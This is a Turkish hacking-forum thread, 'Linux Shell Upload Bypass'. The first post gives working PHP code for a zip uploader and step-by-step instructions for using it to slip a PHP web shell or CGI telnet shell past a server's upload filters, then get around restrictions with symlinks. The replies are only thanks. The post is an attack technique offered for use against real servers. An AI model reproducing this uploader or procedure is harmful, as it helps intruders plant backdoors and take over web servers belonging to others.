Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Sunucu Yönetimi ve Güvenliği
> Linux Server Yönetim

Linux Server Yönetim Linux server yönetim ve yazılımlar


Linux Shell Upload Bypass

Linux Server Yönetim

Yeni Konu aç Cevapla
 
Seçenekler
Alt 3 Hafta önce   #1
  • Offline
  • Yüzbaşı
  • Genel Bilgiler
Üyelik tarihi
Jun 2017
Nereden
Kayseri
Mesajlar
Konular


  
Linux Shell Upload Bypass



Linux Shell Upload Bypass

Günümüz optimize sunucularında PHP Shell yememe oranı gittikçe artıyor.

PHP SHELL upload yapılamayan sunucularımızda ZİP Uploader yardımı ile shellimizi zip şeklinde upload edebiliriz.


Zip Uploader :

Kod:
<?php echo ’<b>Sw Bilgi

’.php_uname().’
Yükleyeceğiniz Dosya .zip Olamlıdır.</b> // katilhacker’;
echo ’<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">’;
echo ’<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>’;
if( $_POST[’_upl’] == "Upload" ) { $file = $_FILES[’file’][’name’];
if(@copy($_FILES[’file’][’tmp_name’], $_FILES[’file’][’name’])) { $zip = new ZipArchive;
if ($zip->open($file) === TRUE) {
    $zip->extractTo(’./’);
    $zip->close();
echo ’Yükleme Başarılı’;
} else {
echo ’Yüklendi Ancak Çıkarma Başarısız.’;
}
}else{
echo ’<b>Basarisiz</b>

’;
}
} ?>
Normal basit bir uploader gibi görünsede kullanışımız farklı olucağı için işe yarıyabilir bir uploader haline gelicek.

Öncelikle sunucuya yedirmek istediğimiz PHP Shellimizi zip haliyle arşiv haline getiriyoruz.


Yani ;

Shell.php dosyasını winrar yardımı ile zip şeklinle sıkıştırıp shell.zip haline getiriyoruz.

Sonrasında uploader.php’mizi sunucuya upload ediyoruz.

Burdan sonra ise uploader.php’mize girip shell.zip dosyamızı upload ediyoruz.

Daha sonra zaten shell.zip upload edildi cevabı ile karşı karşıya geliyoruz.

Burda bilmeniz gereken en önemli nokta, Shellimize shell.zip şeklinde değil shell.php şeklinde giriyoruz.




Aynı methodu cgitelnet’imizdede yapıyoruz.

cgi.izo dosyasını zipleyip sunucumuza atıyoruz sonrasında cgimize normali gibi cgi.izodan giriş yapabiliriz.

CGİ upload olduktan sonra manuel symbolic ile bypass olabilirsiniz.

Alıntıdır..
    
Offline
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #2
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Jul 2017
Nereden
T Ü R K
Mesajlar
Konular


  


Eline sağlık
    
Offline
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #3
  • Offline
  • Teğmen
  • Genel Bilgiler
Üyelik tarihi
May 2016
Mesajlar
Konular
4


  


eline sağlık.
    
Offline
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #4
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Sep 2017
Nereden
Nereye...
Mesajlar
Konular


  


Eline Sağlık ))
    
Offline
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #5
  • Offline
  • Teğmen
  • Genel Bilgiler
Üyelik tarihi
Jun 2016
Nereden
Nereye...
Mesajlar
Konular


  


Elinize Sağlık
    
Offline
 
Alıntı ile Cevapla
Alt 3 Hafta önce   #6
  • Offline
  • Yüzbaşı
  • Genel Bilgiler
Üyelik tarihi
Jun 2017
Nereden
Kayseri
Mesajlar
Konular


  


Alıntı:
MixPro´isimli üyeden Alıntı Mesajı göster
Eline sağlık
Teşekkürler

Alıntı:
KaraMelek13´isimli üyeden Alıntı Mesajı göster
eline sağlık.
Teşekkürler

Alıntı:
Krypt0n´isimli üyeden Alıntı Mesajı göster
Eline Sağlık ))
Teşekkürler

Alıntı:
CemilK´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık
Teşekkürler
    

Konu M4K4R tarafından ( 2 Hafta önce Saat 15:49 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks Kapalı
Pingbacks Kapalı
Refbacks Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2018

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links

wau

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.